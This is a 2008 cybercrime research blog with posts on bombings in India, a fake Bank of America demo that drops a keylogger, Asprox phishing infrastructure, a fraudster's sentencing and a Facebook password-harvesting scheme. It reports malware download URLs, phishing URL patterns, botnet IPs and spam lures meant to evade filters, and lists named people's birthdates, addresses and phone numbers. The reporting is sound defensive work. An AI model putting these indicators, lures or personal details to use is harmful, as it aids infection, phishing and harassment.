Thursday, November 27, 2008

Mumbai Bombings: Coordinated Bombings in India are Nothing New

The Mumbai bombings are getting non-stop coverage on all the news channels this morning, but they seem to be missing one really crucial element that anyone who does terrorism research could easily point out:

Coordinated Bombings in India are Nothing New!

The only thing new here is the targeting of westerners.

For those who are coming to this realization recently, please forgive a diversion from our normal Cyber Crime topics to explain.

The most telling revelations about the current bombing will be to see the construction of the bombs, and none of the media outlets has that level of information right now.

The National Security Guard's National Bomb Data Centre has statistics on bombings in India. During 2007 there were 376 IED blasts and a total of 530 bombing incidents in 2007.

October 30, 2008 - The Assam Bombings


10 - 18 blasts kill 84, 470 injured


In the city of Guwahati, Assam, crowded shops in Pan Bazar and Fancy Bazar were hit with grenade attacks, while a car bomb went off at Ganeshguri. 41 killed in Guwahati, 21 killed in Kokrajhar, 15 killed in Barpeta. The explosions all occured within 15 minutes, and Assam police chief Mathur says most of the bombs were planted in cars. While the original attack was claimed by "Islamic Security Force-Indian Mujahideen" via text message, and original attribution was assigned to the Harkat-ul-Jihad-al-Islami (HuJI), investigations later focused on the National Democratic Front of Bodoland (NDFB), a separatist group focused on seeking an independent state for the Bodo people group. As the investigations unfolded, it became clear that there were actually three terror groups working together here. The ULFA (the United Liberation Front of Asom), the NDFB, and HuJI. These groups were actually united as a result of "Operation All Clear" which destroyed more than 30 terrorist camps in the southeastern area of Bhutan. While the Indian Chief of Army Staff, General N.C. Vij claims that more than 650 militants were neutralized during Operation All Clear, more than 2,000 other militants from these camps scattered to fight another day.

For more on Operation All Clear, see Praveen Kumar's article in "Strategic Analysis", External Linkages and Internal Security: Assessing Bhutan's Operation All Clear (21 page PDF).

Arrests in the Assam bombings continued as recently as last week, when Dipak Basumatary was identified as the NDFB Lieutenant behind the serial bombing. Investigators into the bombing shared details about the bomb according to the South Asia Terrorism Portal. (SATP has the hands-down best publicly available data on India's Terrorist groups)

The investigating agencies had found clues that ULFA and NDFB carried out the Assam serial blast of October 30 with the help of Bangladesh-based HuJI. "We have found that the Bangladesh-based HuJI has provided the expertise to ULFA and NDFB as none of them has the technology to explode such devastating bombs which claimed 84 lives," a Home Ministry official said. Home Ministry sources also added that the government is worried over the fact that the northeast militants has started using a deadly mixture of RDX, ammonium nitrate and plasticised explosives to carry out explosions which led to greater casualties which was never seen in the past. Though the operation was masterminded by HuJI at the behest of the ISI, the NDFB and ULFA had provided logistical support.

-- see Incidents Involving NDFB

Sep 13, 2008 - New Delhi Bombings


5 bombs kill 30 and injure 100+



Five small bombs went off in the spamce of 25 minutes in India's capitol city.

The New Delhi bombing has the similarity to the current situation in that an email of responsibility was sent claiming responsibility. In this case the email came just AFTER the first bombing, (see below for some where the email came BEFORE, which is of course much more interesting). The email, which was sent to several television stations claimed that there would be nine blasts in all, "Within five minutes from now . . . this time with the Message of Death, dreadfully terrorizing you for your sins". The email was quickly traced to a Mumbai suburb, with cooperation from Yahoo, (the from address was: Arbi Hindi -- al_arbi_delhi@yahoo.com. It was sent from an open WIFI connection belonging to Christian missionary Kenneth Haywood. "Guru Al-Hindi" was the signature on the email, which matched the emails sent prior to two other bomb attacks. Sunny Vaghela, a cyber-cop in Ahmedabad, shared the details with the IT Examiner for their story Avoid being arrested for sending terror mail:

26JUL2008 - alarbi_gujarat@yahoo.com - sent from 210.211.133.200 - Kenneth Haywood's house in Navi Bombay - an unsecured WiFi router.

31JUL2008 - alarbi_gujarat@yahoo.com - sent from 202.160.162.179 - the Medical College at Vaghodiya, in Gujarat. (This one was sent through a proxy, but traced ultimately the given location).

23AUG2008 - alarbi.alhindi@gmail.com - sent from 121.243.206.151 - Khalsa College at Bombay - another unsecured WiFi router.

13SEP2008 - al_arbi_delhi@yahoo.com - sent from Kamran Power Limited at Bombay - another unsecured WiFi router.

If the current bombing's emails follow the same pattern, it could be an indication that they are related. The most recent email was accompanied by a 13-page document, which is certainly rich for forensic and linguistic analysis!

These earlier emails are thought to have been sent by Abdul Subhan Qureshi, who is called a "crack bomb-maker" after attending SIMI (Students Islamic Movement of India) terror camps from 2006 to 2008 to learn his craft. Before becoming a full-time terrorist, Qureshi worked for Wipro, a computer software company, where he disappeared in 2001, leaving a letter for his employers saying "I wish to inform you that I have decided to devote one complete year to pursue religious and spiritual matters". Despite the proof now that these were SIMI operations, the emails claimed to be from "Indian Mujahideen". Qureshi is also known as Abdul Subhan Tauqeer, and Bilal Qureshi. Qureshi was profiled in The Hindu, reprinted in Rediff as "The Hunt for the Indian Mujahideen's al-Arbi".

On July 30th, an email sent to the Japanese embassy in Delhi claiming responsibility for the Jaipur and Ahmedabad bombings, and stating that the next attack would be in New Delhi.


July 26, 2008 - Ahmedabad


21 bomb blasts - 56 killed and 200+ injured



Just before this series of 21 bomb blasts (some say as high as 30), various media outlets received an email saying "Await 5 minutes for the revenge of Gujarat" and "In the name of Allah the Indian Mujahideen strike again! Do whatever you can, within 5 minutes from now, feel the terror of Death!" The fourteen page email had many threats, but also said "Have you forgotten the evening of July 11, 2006 so quickly and so easily?" The fullest version of the email text I can find so far is on the website Islamic Terrorism in India.

Similar to the current event, a second set of bombs went off at hospitals one hour after the initial bombs. (See for example: The Tribune of Chandigarh). Some reports say four hospitals were targeted.

SIMI leader Abul Bashar Qasmi was arrested as the mastermind behind the July 26, 2008 bombings. (AKA Mufti Abu Bashir). Qasmi was arrested on August 16th, and it was reported on August 17th that he had confessed to his involvement in the blasts in Ahmedabad, and was still being questioned regarding Jaipur.


July 25, 2008 - Bangalore


7 bombs - 2 killed and 20 injured



While these bombings were highly coordinated, the intensity fo the bombs used indicated simplistic explosive devices, very different than those above. Could this have been an effort to shift anti-terror forces attention prior to the bombings which followed the next day? The explosives were based on "gelatin sticks" used in quarry blasting.

Another question is that this bomb run targeted the IT sector (40% of Information Technology businesses in India are in Bangalore) and the current attack is in the heart of the Financial Center for India. Is this a targeting of key infrastructure sectors?

Police originally said that this attack looked like the work of Harkat-ul-Jihad al Islami. Bangladeshi national Mohammad Hakim was taken into custody on July 29th in conjunction with this attack. He admitted that he was trained in bomb making by Mohammad Ansari, who is also a Bangladeshi national.

On September 25th, a SIMI operative named Mohammad Samee Bagewadi, aka Mohammad Samee, was arrested in conjunction with this attack. He had attended SIMI training camps in Castle Rock, Vagamon, and other camps. He was a close associate of SIMI leaders Safdar Hussain Nagori, Hafeez Hussain, Abu Bashar, and others.


May 13, 2008 - Jaipur


eight bombs - 80 killed and 150 injured



The bombs were created using RDX and ammonium nitrate, and filled with ball bearings. Several of the bombs were attached to bicycles.

No one claimed responsibility initially, but the following day an email was sent to various television stations which contained a photo of one of the bicycles, and a close up of the bicycle showing the serial number, which was used in the bomb. The email came from guru_alhindi_jaipur@yahoo.co.uk and said that Indian government must stop supporting the US in the international arena. It went on that "if you do continue then get ready to face more attacks at important tourist places."

As in others, a SIMI operative, Mohammad Shajid, was held for questioning, and raids were conducted in Jaipur, Ajmer, Fatehpur, Godhpur, Tonk, and Sikar.

On May 27th, a madrassa teacher and a telephone booth operator, Kamil, in Bharatpur was arrested for his role in the bombing. The teacher, who used the name "Hakimuddin" was from Nagla Imam Khan village, and had lived in Bharatpur for two years.

On August 24th, Shahbaz Hussain, a resident of Lucknow, was arrested for his involvement in Jaipur. He was called "a key player in planting the bombs" as well as selecting the team which executed the blasts. Shahbaz had a degree in mass communications and ran a cyber cafe in Maulviganj, and was a "key aide" to Sajid Mansoori, who was the mastermind of this attack.

On August 25th, seven more members from the Kota district were arrested. They were trained in three different terror camps between November 2007 and January 2008, along with SIMI activists Mufti Abu Bashir and Sajid Mansuri.

On September 1st, the Rajasthan Special Investigations Team (SIT) arrested four more for their parts in the Jaipur bombing - Munawar Husain (AKA Muzaffar Husain), Atiqur Rehman (AKA Abdul Hakim), Nadeem Akhtar (AKA Yaminuddin), and Mohammed Iliyas (AKA Mohammed Husain).

On September 7th, Mohammad Sohail and Azam from Jodhpur were arrested on their role in helping to generate funds for the Jaipur attacks.

On September 19th, two terrorists involved in the Jaipur, Ahmedabad, Hyderabad, and New Delhi blasts were killed when their flat was raided by the Delhi Police Special Cell. Mohammad Fakruddin (AKA Sajed) Mohammad Bashir (AKA Atiq) were both killed, while two others escaped. Inspector Mohan Chand Sharma, a police officer involved in the raid, was also killed in the firefight.

August 25, 2007 - Hyderabad


2 bombs - 42 killed and 50 injured



While 2 bombs were detonated, 19 other bombs were found, fitted with timers, at bus stops, cinemas, bridges, and a water fountain. The bombs which were detonated went off during a laser light show in a public park.


Sep 8, 2006 - Malegaon


3 blasts killed at least 37 people and injured at least 100



Police found that the explosives used were a mix of RDX, ammonium nitrate, and fuel oil, which is the same mixture used in the July 11, 2006 Mumbai train bombings. Most of those killed were gathered at a mosque where Friday prayers were being held.

http://us.rediff.com/news/2006/sep/08nashik.htm?q=tp&file=.htm


July 11, 2006 - Mumbai Railway


7 bombs - 200 killed



Mar 7, 2006 - Varanasi


- 28 killed, 101 injured



Oct 29, 2005 -


49 killed, 200+ injured



Aug 25, 2003 - Mumbai


2 car bombs - 52 killed, 150 injured



Sep 24, 2002 - Akshardham temple in Gujarat


31 killed, 79 wounded, hostages taken



Feb 14, 1998 - Coimbatore


13 bombs in 11 locations - 46 dead, 200 wounded

Wednesday, November 26, 2008

Bank of America Demo Account - DO NOT CLICK

Beginning on November 25th, the UAB Spam Data Mine has been receiving messages claiming to be from Bank of America which will explain to us how to use our new "Webbanking-2009" interface. Following the link in these email messages will plant a keylogger trojan on your computer. All of your userids and passwords will be sent to the criminals.

The spammed email messages look like this:

BANK OF AMERICA CORPORATION NOTICE:

New online banking account interface "Bank of America Webbanking-2009" will be available after December 12, 2008.
Please take a look on the new account features demo page.
Bank of America provides our clients with a Demo Account to learn how to use new account interface.
You will learn how to work with the Demo Account Station below.
This link will let you know all news in the Future Online Banking with Bank of America.

DEMO ACCOUNT OVERVIEW>>

2008 Bank of America Corporation.



Why would anyone think of doing an online Demo Account malware campaign? Well, its because the Real Bank of America has invited their customers to view a demo of their new Free Online Banking.

Here's the REAL Bank of America "DEMO":



The URL for the real demo is:

http://www.bankofamerica.com/onlinebanking/demo2/flash-model.cfm

What is most malware about today? Its about SOCIAL ENGINEERING. Can the criminal convince the victim that he is trustworthy by imitating someone or something that the victim is likely to trust. What is more trustworthy than your bank? So when the bank sends its customers an invitation to view a demo of their new Free Online Banking, the criminal follows suit.

Here are some of the Subject lines of the emails the criminal is sending:

  • Bank of America - Demo Account
  • Bank of America - DEMO ACCOUNT not working
  • Bank of America - Demo Account Set Up
  • Bank of America - Demo Account Setup
  • Bank of America - demo account traders
  • Bank of America - full access privileges for your DEMO account
  • Bank of America - learn how to trade with the Demo Dealer Station below
  • Bank of America - New Demo Account, Try for FREE
  • Bank of America - Open A Demo Account
  • Bank of America - provides our Bank of America - clients with a Demo
    Account to "paper trade" the Forex market.
  • Bank of America - register for a Demo Account to use new features.
  • Bank of America - Setting Up Your Demo Bank of America Account
  • Bank of America - Sign In.My Business Account Demo.
  • Bank of America - Sign In.My Business Account Demo.
  • Bank of America - The demo is best viewed with your browser
  • Bank of America - Try A Free Demo Account!
  • Bank of America - using a demo account
  • Bank of America - View Demo Account's professional profile
  • Bank of America - View Demo of Prime Account
  • Bank of America - View Site View demo website
  • Bank of America - We Give You The Tools You Need.
  • Bank of America - We Give You The Tools You Need. Try A Free Demo Account!
  • Bank of America - your Demo Account username and passcodes will be
    generated and emailed to you.


Each email has a ridiculously long URL, such as:


http://boundary.launchpad.profile.default.businesslogin.psrxthfblsvjtgz.version.disbursements.privacy.xkfyereogv.frerins.com/demo.htm?/type/arekeninginfo/VERIFY.htm?LOGIN=XTHABCDvJTgzmiOXkEfgHeOgv&refer=WXYandZlSvJTgz

The superlong URLs are to try to cause us good guys problems when we try to fetch their pages into Windows, or zip them up using WinZip, where we'll occasionally get errors about "path too long". In reality, we can shorten the path dramatically and get the same effect. All of the URLs we've seen can be reduced to these five:

frerins.com/demo.htm
inyans.com/demo.htm
neeunt.com/demo.htm
ieenttio.com/demo.htm
onlineservices777.com/demo.htm

(All of the domains were registered in China - BizCN.com and TodayNIC.com -- all of the websites are being hosted with Fast Flux, or botnet machines. If your computer is part of their botnet, then YOU might be helping to host this website.)

Visiting any of these sites shows you a webpage that looks like this:



which prompts users to download "Adobe_Player9.exe" to view the Demo of their new account.

The first phase of the virus is that Adobe_Player9.exe, which is a tiny little dropper of 3,225 bytes in size. The current version has an MD5 of 2ef0de5993873f26529ac34012eb97d9, and is detected by 17 of 37 products according to a current VirusTotal.com report.

The second phase of the virus is downloaded from the URL:

http://silviocash.com/usp.exe

That part of the virus does all the work and plants the keylogger and rootkit. This file is 59,392 bytes in size and has an MD5 of 227c31e1b0e4867bcaefe86a674a6981. Although VirusTotal is listing 10 out of 37 products detecting this in this VirusTotal.com report, its clear that most of these AV's actually do not know what this is, even if they may think it looks suspicious.

AhnLab, Ikarus, Microsoft, and NOD32 know what this virus is. The first three call it "Ursnif" and the last calls it "Papras". That is an accurate description. AVG, McAfee+Artemis, Norman, and SecurewWeb mark it as suspicious based on the fact that it is packed. (AVG calls it "Pakes", which I believe just means "packed file").

After becoming infected, a new Windows Service called "new_drv.sys" will be running on the computer, but will be hidden from most Windows processes. (For example, doing a directory listing, even at a DOS prompt, will not show the file, and listing running processes, for instance in Task Manager, will also not show the file. That's the job of the rootkit function, to hide the existence of the new program from Windows.)

Anytime Internet Explorer is active, userids and passwords, and really anything else that is entered into an online form, are sent to the criminal.

This is the same family of malware which we have warned about so many times in the past -- Papras is the common virus name for all of the "Digital Certificate" malware, and "URSnif" is the name of the routines which do keylogging and send the keys to the badguy in this particular way. We've been talking about Digital Certificates all the way back to our May 6th Digital Certificate Alert! story.

The combination of the old Digital Certificate keylogger with the fake AdobePlayer to see a video began with the Obama acceptance speech video, as we reported the day after the election in our story Computer Virus Masquerades as Obama Acceptance Speech.

Friday, November 21, 2008

AsProx: The Phisher King?

The most spammed phish on the planet took a brief respite after the McColo network was shut down, but the Phisher King is back again.

We see as many as ten thousand reports per day and more of the Asprox spammed phish, and sadly this has been going on non-stop for as long as we can remember, with the brief exception of last week.

The typical scenario is that ten domain names are chosen and used to spam URLs which contain a high degree of randomization. Abbey Bank has been their favorite target for nearly all of 2008. The first "word" of the URL is followed by a number, then the brand name, then a random string, and then the domain name. The path portion of the URL is consistent for each brand currently spammed. Following the path there is a question mark, and then what seems like random characters, but which actually can be decoded into the email address of the person who received the spam. (We'll leave the encoded email address portion off in our examples).

The "Abbey" path for some time has been "/CentralLogonWeb/Confirm?"



The current "Associated Bank" path is "/web_bank/confirm.asp?"



http://myonlineaccounts0.abbey.co.uk.html650963.input2.cc/CentralLogonWeb/Confirm?srvid=
http://myonlineaccounts0.abbey.co.uk.http60319982.code11.ca/CentralLogonWeb/Confirm?update=
http://myonlineaccounts1.abbey.co.uk.doc618591.root71.ws/CentralLogonWeb/Confirm?confirm=
http://myonlineaccounts1.abbey.co.uk.fast35837924.3update.eu/CentralLogonWeb/Confirm?file=
http://myonlineaccounts2.abbeynational.co.uk.browse9701521.sslweb5.bz/CentralLogonWeb/Confirm?version=
http://myonlineaccounts2.abbey-national.co.uk.comm2053275.code11.ca/CentralLogonWeb/Confirm?service=
http://myonlineaccounts2.abbey-national.co.uk.control790833.3update.eu/CentralLogonWeb/Confirm?cipher=
http://myonlineaccounts2.abbeynational.co.uk.err9962057184.5version.mobi/CentralLogonWeb/Confirm?debug=
http://ww2.abbeynational.com.server3610179.input2.cc/CentralLogonWeb/Confirm?bin=
http://ww2.abbeynational.com.sslcom670006.8locate.tk/CentralLogonWeb/Confirm?lang=
http://ww2.abbeynational.com.sys2481.offset9.name/CentralLogonWeb/Confirm?check=

http://bolb1.associatedbank.com.pif02.jp/web_bank/confirm.asp?log-in=
http://bolb1.associatedbank.com.root71.ws/web_bank/confirm.asp?version=
http://bolb1.associatedbank.com.sslweb5.bz/web_bank/confirm.asp?spool=
http://bolb1.associatedbank.com.sys17.name/web_bank/confirm.asp?set=

http://www8.associatedbank.com.sslcom5.cc/web_bank/confirm.asp?tag=
http://www8.associatedbank.com.sys17.name/web_bank/confirm.asp?locate=
http://www8.associatedbank.com.sys17.name/web_bank/confirm.asp?offset=
http://www8.associatedbank.com.sys17.name/web_bank/confirm.asp?script=

Just in the last twenty-four hours, we saw more than 25,000 variations of these URL patterns.

How does the Phisher King keep his domains alive? Part of it is his use of a wide and ever-shifting set of Registrars. For example, consider today's domains:

Abbey Domains:

sslweb5.bz
code11.ca (registered 29oct08 with Internic.ca)
input2.cc (registered 06NOV08 with Moniker)
2r2cw3a8u.com (registered 12NOV08 with XIN NET Technology)
3jk2p84x1.com (registered 12NOV08 with XIN NET Technology)
topmango.com (registered in 2001 with TuCows)
3update.eu (registered 06NOV08 with PublicDomainRegistry.com)
ide08.gs (registered 12NOV08 with Key-Systems)
48filt.jp (funky .jp whois gives no useful data)
4logon.jp (funky .jp whois gives no useful data)
pif02.jp (funky .jp whois gives no useful data)
5version.mobi (registered 06NOV08 with Directi Internet Solutions)
25uid.name (registered 06NOV08 with Directi Internet Solutions)
sys17.name (registered 05NOV08 with UK2 Group)
8locate.tk ("locked" by the clueless idiots at "Dot TK" with the phish live)
15load.tv (registered 04NOV08 with UK2 Group)
17gdi.tv (registered 11NOV08 with UK2 Group)
manage5.tv (registered 29OCT08 with UK2 Group)
root71.ws (registered 06NOV08 with Directi Internet Solutions)
udp96.ws (registered 04NOV08 with Directi Internet Solutions)

Associated Domains:

sslweb5.bz (error)
code11.ca (registered 29OCT08 with Interic.ca Corp)
input2.cc (registered 06NOV08 with Moniker ONline Services)
6tagid.com (registered 05NOV08 with Moniker Online services)
3update.eu (registered 06NOV08 with PublicDomainRegistry.com)
ide08.gs (registered 12NOV08 with Key-Systems)
login5.gs (registered 30OCT08 with Key-Systems)
1server.jp (registered 04NOV08 - whois.jprs.jp)
48filt.jp (registered 30OCT08 - whois.jprs.jp)
4logon.jp (registered 31OCT08 - whois.jprs.jp)
asp29.jp (registered 12NOV08 - whois.jprs.jp)
log-in1.jp (registered 27OCT08 - whois.jprs.jp)
pif02.jp (registered 06NOV08 - whois.jprs.jp)
5version.mobi (registered 06NOV08 with Directi Internet Solutions)
25uid.name (registered 06NOV08 with Directi Internet Solutions)
sys17.name (registered 05NOV08 with UK2 Group Ltd)
8default.net (registered 05NOV08 with Moniker Online Services)
8locate.tk (dot.tk does odd things with domains)
15load.tv (registered 04NOV08 with UK2 Group)
17gdi.tv (registered 11NOV08 with UK2 Group)
manage5.tv (registered 29OCT08 with UK2 Group)
root71.ws (registered 06NOV08 with Directi Internet Solutions)
udp96.ws (registered 04NOV08 with Directi Internet Solutions)




That's just the beginning though. Then we have the problem of the nameservers and Fast Flux hosting. While most domains have two or three nameservers, these domains have as many as 19. ns1.sslweb5.bz, ns2.sslweb5.bz, ns3.sslweb5.bz . . . all the way up to ns19.sslweb5.bz.

The IP addresses used for the nameservers are compromised home computers running the Asprox malware. Without the knowledge of these computer's owners, they provide the nameserver resolution for the phishing domains. Just as an example, the following IP addresses are all currently acting as nameservers for the Asprox phishing sites:

62.219.252.109
67.85.69.196
68.6.180.109
68.197.137.239
69.152.88.191
69.183.251.177
70.82.24.172
70.154.82.100
72.12.170.148
72.204.44.232
74.57.110.49
74.193.44.82
74.196.156.180
75.109.252.245
76.73.237.59
76.179.26.169
76.182.187.206
76.240.151.177
76.248.76.121
99.224.77.151

Each one of these IPs provides nameservices for dozens of domains used by this criminal. Currently they are serving:
sslweb5.bz
code11.ca
input2.cc
sslcom5.cc
3update.eu
ide08.gs
11tag.in
1server.jp
48filt.jp
4logon.jp
63root.jp
asp29.jp
pif02.jp
5version.mobi
25uid.name
offset9.name
sys17.name
berjke.ru
8locate.tk
15load.tv
17gdi.tv
libid5.tv
manage5.tv
root71.ws
udp96.ws

The Nameservers are used to direct email recipients to other infected computers where they are shown the fake bank pages. (Those computers are actually acting as a "proxy" to load the real phishing data from yet another location.)

In addition to the phishing pages, the other machines in the botnet also provide infection services.

The current domains being used for infection are:

www.berjke.ru
and
www.81dns.ru

Google Safe Browsing won't let you visit either of those sites, because they have been "an intermediary for the infection of 770 sites including ssaga-g.com, csmfilter.co.kr, parenthesis-mykonos.com". Google Safe Browsing goes on to answer the question "Has this site hosted malware?" by saying "Yes, this site has hosted malicious software over the past 90 days. It infected 3324 domains including csmfilter.co.kr, sarangsae.com, istanbulihl1991.com.

Checking Google Safe Browsing for one of those sites shows things like:

"Of the 423 pages we tested on this site over the past 90 days, 130 pages resulted in malicious software being downloaded and installed without user consent. The last time Google visited the site was 2008-11-21, and the last time suspicious content was found on the site was on 2008-11-21.

Malicious software includes 168 scripting exploits, 28 exploits, 4 trojans. Successful infection resulted in an average of 2 new processes on the target machine.

8 domains appear to be functioning as intermediaries for distributing malware to visitors of this site, including egyptgood.cn, 81dns.ru, berjke.ru


At the current moment, there are 18,400 "drive-by" infection sites just with that script site loaded in Google. Some of the infected sites are hotels, ski resorts, chemical companies, motorcycle sites, real estate sites, chemical companies, nail salons, churches, the government of Ohio (survey.workforce411.ohio.gov has many infected pages).

There have been MILLIONS of these pages . . . I'll have more details soon....

Thursday, November 20, 2008

Igor Klopov sentenced

Its nice to finish a story sometimes, so this brief entry will do that. Back in August 2007, we did a story called How Far Would You Travel for $7 Million describing the undercover sting where Igor Klopov was lured to the United States to be arrested.

Charges were brought against Klopov and described as:

The defendants have been charged with Conspiracy in the Fourth Degree, Grand Larceny in the First Degree, Attempted Grand Larceny in the First Degree, Money Laundering in the First Degree, Attempted Money Laundering in the First Degree, Grand Larceny in the Second Degree, Attempted Grand Larceny in the Second Degree, Money Laundering in the Second Degree, Attempted Money Laundering the in the Second Degree, Grand Larceny in the Third Degree, Attempted Grand Larceny in the Third Degree, Identity Theft in the First Degree, Forgery in the Second Degree, Criminal Possession of a Forged Instrument in the Second Degree, Criminal Possession of Stolen Property in the Fourth Degree and Criminal Possession of Forgery Devices. Money Laundering in the First Degree and Grand Larceny in the First Degree are both a class B felonies which are punishable by up to 25 years in prison.


So, with all those charges, what kind of sentence was actually passed down by New York Supreme Court Justice Gregory Carro?

Three and a half to Ten and a half years. WHAT?!?!?!! 3.5 Years!?!?!?

Apparently sentenced are slashed if you're really, really, really sorry.

The story has been used as a case study even before the sentence was reached, with Assistant District Attorney Jeremy Glickman doing lectures on the case from a Summer Intern "Brown Bag" Lunch to a National White Collar Crimes Summit presentation called Piercing the Iron Cyber Curtain: Case Studies in International Financial Crimes

Choosing victims from the Forbes Magazine 400 Richest People list, Klopov had several successful capers, with the largest being the theft of more than $1 million from a Fidelity Investments account belonging to a Silicon Valley couple, before he got stung going for his biggest case yet.

In his last attempt, the target was Charles Wyly. Wyly, who is George W. Bush's 9th largest "lifetime donor", is best known in computer circles as the guy who sold Sterling Software and Sterling Commerce for $8 Billion back in 2000, but the family has also dealt in Oil and Restaurants, and is currently behind a "Green Electricity" company called GreenMountain. Klopov managed to convince JP Morgan Chase to send a checkbook from Wyly's Home Equity Line of Credit account to Charles Dalton in Houston. Dalton then took the checkbook to the group's forger, Watson, who used it to write a $7 Million check to a gold broker in New York. JP Morgan Chase confirmed the check had not been issued by asking Mr. Wyly about it. The US Secret Service, working with the New Yorkers, managed to convince Klopo to come to the US to pick up the gold in person, which is when he got busted, back in May 2007.

More details about the case, including some other fascinating high end identity theft attmempts, are available from the New York County District Attorney's Office's initial press release, where they describe Klopov recruiting forgers and impersonators on online job sites.


His co-conspirators have all plead guilty:

IGOR KLOPOV, 5/12/83
5 Gospitaly
Moscow, Russia

JAMES DALTON, 3/28/74
517 Northwood Drive
Conroe, Texas

RICHARD HOSKINS, 9/1/78
415 Spring Street
London, Kentucky

WESTLEY WATSON, 10/2/70
8810 Pembroke Avenue
Detroit, Michigan

LEE MONOPOLI, 9/12/66
4200 NW 12th Avenue
Ft. Lauderdale, Florida

Monday, November 17, 2008

Facebook Users Beware

I'm looking into an interesting Facebook phenomenon this morning. Several of my "friends" on Facebook have received messages that look like these:

---

hey did u know your facebook pic was just featured on kchangblab.com

hey has anyone told you ur facebook pic was just featured on srcate.com

hey do u realize your default image is displayed on moreprofilestrade.com

did you know your profile pic is all over brightium.com

has anyone told u ur facebook pic was just featured on gabblemodule.com

---

The question is, "What's causing these posts?" Did these messages really come from their friends? Are they being generated by malware on their friends computers? or has someone compromised their passwords?

While I wait for these friends-of-friends to respond, I thought I would dig in to the domain names in question.

The WHOIS data for each says the domains are owned by

Adam Arzoomanian bulletinpics@gmail.com
375 E Harmon
Las Vegas
NV
89109
US

According to DomainTools.com, bulletinpics@gmail.com has registered 491 different domain names!

On some, the address has an extra line that says:
"The site is a fun prank - the pic is of a monkey"

The phone number Adam uses, 702.922.1911, belongs to Spin Night Club Promotions in Las Vegas, Nevada. That address is across the street from the Hard Rock Hotel, and is used by the "Alexis Park Resort", which is a "Spin Promotion LV Company", Las Vegas' Premiere Upscale Hip Hop Venue. We've also been able to confirm that Adam Arzoomanian is a real person and is really associated with Spin Night Club at Alexis Park. For instance, this story from Las Vegas Weekly:

This new nightclub project is just one of many for Arzoomanian, who will also oversee the Alexis Park’s gaming initiatives, building a casino resort on the two lots behind the current property as well as expanding the suites and villa according to a three- to five-year plan. “This is just the tip of the iceberg for Alexis Park,” says Arzoomanian, who adds that of all the projects in the works, designing Spin is his hobby. At present, no rendering exists for the new club. “It’s in my head.”
(Full Story

The question remains whether the Real Adam knows anything about all of his domains . . . The number listed has a full voicemail box. Using the voicemail directory, we find that there are many many people who use the same voicemail service, including cleaning services, ticket services, hearing aid services, etc.


------
Let's see what other domains we can find for Adam Arzoomanian . . .

azureclub.com
bubbit.com
dinaunit.com
flagtap.com
flaptag.com
flapstate.com
gabient.com
gabize.com
gabload.com
gabmodule.com
gabblemodule.com
lightzoom.com
mdanclub.com
stolenprofiles.com
swapsecretphotos.com
swapsecretprofiles.com
tabmodule.com
tabtoken.com
tabunit.com
ubztoken.com
wackbase.com
wayizer.com

All of those domains (and probably many more) forward to the single domain:

friends-to-friends-only.com (created Oct 8, 2008 on Moniker Online)

which uses a frameset to pull the actual content from:

http://rotating-destination.com/taf/taf.html

(TAF = Tell A Friend)

Rotating Destination is a TuCows registered domain created on September 29, 2008, with "protected" WHOIS information. Compete.com says the site gets 140,000 unique US-based visitors per month, and Quantcast ranks it as the 12,588th most popular site on the Internet.

After the "login" portion (and ask yourself again, WHY would anyone need to ask for a password here?) the action forwards to yet another website:

http://www.this-isnt-personal.com/taf/picmatch.html
We've sent an email link to this blog entry to bulletinpics@gmail.com and are waiting for a response. As mentioned above, we weren't able to leave Adam a voicemail at his listed number, but the people at Alexis Park were much more helpful. Adam is no longer the GM at their resort. I've left a voicemail for their webmaster/computer guy at the resort, and hopefully that will get us somewhere further. It should be enough to get Moniker to "unregister" all the domains, we hope . . .

The site CLAIMS to be a "prank" site, where ultimately your friend sees a picture of a monkey and is supposed to giggle about how funny it is that their profile was said to be a monkey.

Question. Why would someone pay to register 491 different domain names to display a joke picture of a monkey?

Here's the sequence of webpages . . .










At the end there is one more link, inviting you to trick your friends by sending an email like this:


Here's how we recommend you trick your friends with this
harmless prank site. We're pretty sure they will send
you a funny reaction!

Send them an email. Try one of these lines...

did u know ur image is displayed on
do u realize ur photo is featured on
has anyone emailed you to let you know ur pic is all over
ur picture is at

Copy/Paste one of these domains to the end of your message.

stolenprofiles.com
swapsecretphotos.com
swapsecretprofiles.com

For example:

do u realize ur photo is featured on stolenprofiles.com

(Note we rotate these suggestions often to avoid messages
being caught in spam filters even though they are not spam.)

Try sending it through regular email with no subject line.
That is most effective.

Try to avoid social sites like MySpace and FaceBook because
they may block your message or even call you a spammer or
a phisher. These sites don't want you to send friends
to external sites like ours. Regular email is best,
ie. Gmail, AOL, etc.

Have fun!


So what do you think? A prank? or an interesting way to harvest people's passwords? I don't know the answer yet, but it certainly struck me as something worth looking into more deeply.

Best theory at the moment . . . users are known to use the same passwords in multiple locations. Could this be a way of trying to harvest email and/or facebook userid and password pairs?


Note: About six hours after posting this, a friend shared with me that Trend Micro had already blogged about this subject. They found a couple things I didn't see -- including some pop-up messages that I missed because I didn't let the criminal run scripts on my laptop -- and some historical data tying the criminal's email address to a "Captcha" scheme he previously ran. Certainly worth reading if this subject interests you Click here for TrendMicro Blog coverage of this story.

Sunday, November 16, 2008

Enlisting YOUR BANK to steal your identity

In the past month, we've had three spam campaigns which had one thing in common. They all downloaded files from sergej-grienko.com, and they all "injected" additional questions when you visited your REAL BANK's REAL WEBSITE.

What were the three spam campaigns?

The first was a "You have received an eCard" spam with an ecard.zip attachment. We received around 500 copies of the virus in spam messages between October 1st and October 15th.

The second was a "New anjelina jolie sex scandal" spam with a .zip attachment. We received several versions of this spam - nearly 2,000 copies of the virus - between October 15 and October 27th. The files that we received labeled as "anjelina.zip" on October 15th were very similar to the files we received on October 15th for the ecard.zip.

The third run was "Barak Obama sex scandal" spam with a .zip attachment. These were received on November 10th and 11th, with an attachment named "zeland-01.zip". A similarly configured "new scandal anjelina joly" and "New anjelina jolie sex scandal" was also sent on November 10th, containing an attachment called "ecard.zip", despite the fact that the subject and body suggested something else. zeland-01.zip contained a file called "obama_video.exe".


Oct 1 ecard.exe == 69760de6a852ab59fd18a186a871fc98

Oct 15 e-card.exe == 2521120ff95c2cad5c0b7cd724a0dbb0

Oct 17 Anjelina == 9d40e58d4b91df1fdf7afd3b05dba6d6

Oct 27 anjelina_video.exe == da26039cfcf82b7e8ff659b503cbc9ee

Nov 10 obama_video.exe == bf23b74c51673b6958aa2ffeeca36d1c


The website sergej-grienko.com is in Russia and doesn't run Apache or IIS or any other common webserver. Its running a webserver called "nginx" (Pronounced Engine-X). That's a huge negative right there. Many webservers that host malware are using this webserver type.

